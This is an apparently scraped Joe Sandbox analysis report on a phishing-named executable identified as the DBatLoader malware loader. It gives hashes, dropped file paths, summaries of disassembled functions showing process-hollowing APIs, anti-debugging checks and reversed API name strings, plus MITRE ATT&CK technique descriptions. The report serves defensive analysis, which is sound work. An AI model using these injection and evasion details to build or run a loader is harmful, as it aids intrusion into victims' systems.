Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 1E91C272E003198EDB10CF69CEC4BEEB7A9BF64764F50461AE951EBAC1D7B08940CB14

Function 22A79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 22A79191
@, xrefs: 22A79175

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: bb872f4be797e252c6e2dfadc298582d963f8799c4169a2cb12a05f50d15f123
Instruction ID: 4d820579326aa497c7b86aea258151eef20422bf84af885214812098b9ee1a53
Opcode Fuzzy Hash: bb872f4be797e252c6e2dfadc298582d963f8799c4169a2cb12a05f50d15f123
Instruction Fuzzy Hash: 5E813972D003699BDB318B54CD44BEEB7B4BF08754F0041EAAA19B7680E7745E84CFA5

Analysis Process: Cpbxcxnx.PIFPID: 5800, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1478
Total number of Limit Nodes:	13

Executed Functions

Function 02CC79B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CC7A27

Strings

yromeMlautriVetacollAwZ, xrefs: 02CC79CF
ntdll, xrefs: 02CC79FC

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: e6fdf6f1a810017f3fb45acf3788dbd3e6705aaa12a748cae46676870fb10223
Instruction ID: ed1d10965a52677eb7627e1799324b798f0ad3e881461283b5dbd8a4706b7500
Opcode Fuzzy Hash: e6fdf6f1a810017f3fb45acf3788dbd3e6705aaa12a748cae46676870fb10223
Instruction Fuzzy Hash: FA113574644208BFEB15EFA4DC51EAEB7ADEB48710F618868F904D7A41DA30EE149F60

Function 02CC79B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CC7A27

Strings

yromeMlautriVetacollAwZ, xrefs: 02CC79CF
ntdll, xrefs: 02CC79FC

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 9dab1236a26cbebcaa6dc9851b1c5418d144d65b2d30c38d82b57ea516be24ca
Instruction ID: 03b81a385b6d70c4979dfd1c66779bbf4e114f2d1b5caf7beffa2acb8a9726f8
Opcode Fuzzy Hash: 9dab1236a26cbebcaa6dc9851b1c5418d144d65b2d30c38d82b57ea516be24ca
Instruction Fuzzy Hash: 1C115774644208BFEB15EFA4DC51E9EB7ADEB4C710F618868F904D7A41DA30EA14DF60

Function 02CC8254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CC82C5

Strings

yromeMlautriVdaeRtN, xrefs: 02CC826F
ntdll, xrefs: 02CC829C

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2004920654-737317276
Opcode ID: 79476487d0805dc815d34b51da958647eef66ce9678d8188f5eb561e32ee9c55
Instruction ID: a06762e3e028f57b7a1db7c1fad71c169c294ddd88e475cb8972357d007e8494
Opcode Fuzzy Hash: 79476487d0805dc815d34b51da958647eef66ce9678d8188f5eb561e32ee9c55
Instruction Fuzzy Hash: F1015774604208BFEB12EFA8D851E9F77EEEB48710F614964F504D7A00D630ED109B24

Function 02CC7D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CC7D74

Strings

yromeMlautriVetirW, xrefs: 02CC7D1B
Ntdll, xrefs: 02CC7D4B

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 4260932595-3542721025
Opcode ID: db4896ec7ccd1f9a051f23a6d7b99b4df59a90d52efa271370e653eae26467f2
Instruction ID: ba7443da7b11087ac161fdb47855a667d89692593ecf2b618aca7906249e8e9a
Opcode Fuzzy Hash: db4896ec7ccd1f9a051f23a6d7b99b4df59a90d52efa271370e653eae26467f2
Instruction Fuzzy Hash: 65012974604208BFEB11EFA8E851EAEB7EDEB48710F614464F508D7B40D630ED149F64

Function 02CC84C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

NtUnmapViewOfSection.NTDLL(?,?), ref: 02CC8529

Strings

noitceSfOweiVpamnUtN, xrefs: 02CC84DF
ntdll, xrefs: 02CC850C

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 2801472262-2520021413
Opcode ID: 7a18eb269d577a28806afb431ed17ccde9f39ebf3521feea59cacb76b349678e
Instruction ID: 1b492233f79a6e3e2c6e913ba22ccdf6df45ffb5d2573b427bceab747dd7fa26
Opcode Fuzzy Hash: 7a18eb269d577a28806afb431ed17ccde9f39ebf3521feea59cacb76b349678e
Instruction Fuzzy Hash: B3018F78A44204BFEB16EBA4D851A9EB7AEEF49710F614964F50497B00CA70ED11DE20

Function 02CC85DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CC8668

Strings

CreateProcessAsUserW, xrefs: 02CC85F5
Kernel32, xrefs: 02CC8627

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressCreateHandleModuleProcProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 4105707577-2353454454
Opcode ID: 51872e42b8a189cd5ae8546693ae9caa457967cb6de7bde15850b6b0fcf4a10b
Instruction ID: 1c12812a3a473b168edf43b0ae23602045eecd521be6ad90e4fe4aa398a5af0c
Opcode Fuzzy Hash: 51872e42b8a189cd5ae8546693ae9caa457967cb6de7bde15850b6b0fcf4a10b
Instruction Fuzzy Hash: DD11D3B5604208BFDB52EEA8DD51F9B37EDEB0C710F614624FA08D7A40C634ED109B64

Function 02CC840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

WinExec.KERNEL32(?,?), ref: 02CC8478

Strings

Kernel32, xrefs: 02CC845B
WinExec, xrefs: 02CC8429

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressExecHandleModuleProc
String ID: Kernel32$WinExec
API String ID: 3450258509-3609268280
Opcode ID: 46d3a64edaeeb2c980326e9cc7a99a7659d12be13daa0a2f5d4953144a3c7b11
Instruction ID: b8ca0f22ead6d31d3e9841f98699960d244ebd96e12d747521e7fb74a4cb50e4
Opcode Fuzzy Hash: 46d3a64edaeeb2c980326e9cc7a99a7659d12be13daa0a2f5d4953144a3c7b11
Instruction Fuzzy Hash: 1A018174A44204BFEB22EFA4DC21B9B77EDEB48B10F618525F604D3B41D674ED109B24

Function 02CC8410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072

Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D

WinExec.KERNEL32(?,?), ref: 02CC8478

Strings

Kernel32, xrefs: 02CC845B
WinExec, xrefs: 02CC8429

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: AddressExecHandleModuleProc
String ID: Kernel32$WinExec
API String ID: 3450258509-3609268280
Opcode ID: a2b61690349af959b7b6151d96c12562f5782a443885d1291cc08308de6ccede
Instruction ID: 759aadccba94a38b31759f240ceed83e7a7596887ed005b78d71345144fd40b2
Opcode Fuzzy Hash: a2b61690349af959b7b6151d96c12562f5782a443885d1291cc08308de6ccede
Instruction Fuzzy Hash: 72F08174A44204BFEB22EFA4DC21B9B77EDEB48B10F618525F604D3B41D674AD109B24

Function 02CCEBF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CCEC29

Strings

CheckRemoteDebuggerPresent, xrefs: 02CCEC0C
KernelBase, xrefs: 02CCEBFB

Memory Dump Source

Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 3662101638-539270669
Opcode ID: 6fc6d826dd92796cee62fdd7f4ea2705c77f91b2764eef30d25f1e4220a75fc4
Instruction ID: a8c31f514015f1c2c748f5caf2ca87c3aa0711984297418914bd3b96ce80dba9
Opcode Fuzzy Hash: 6fc6d826dd92796cee62fdd7f4ea2705c77f91b2764eef30d25f1e4220a75fc4
Instruction Fuzzy Hash: 7CF0A07090464CAAEB22A7B8C8897EDFBAD6B06338F7403A8E424621C1E7750784C651

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Cpbxcxnx.url

C:\Users\Public\CpbxcxnxF.cmd

C:\Users\Public\Libraries\Cpbxcxnx

C:\Users\Public\Libraries\Cpbxcxnx.PIF

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\xnxcxbpC.pif

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Function 02CE8BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Function 02CE8BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Function 02CD5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 02CE87A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Function 02CEEBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre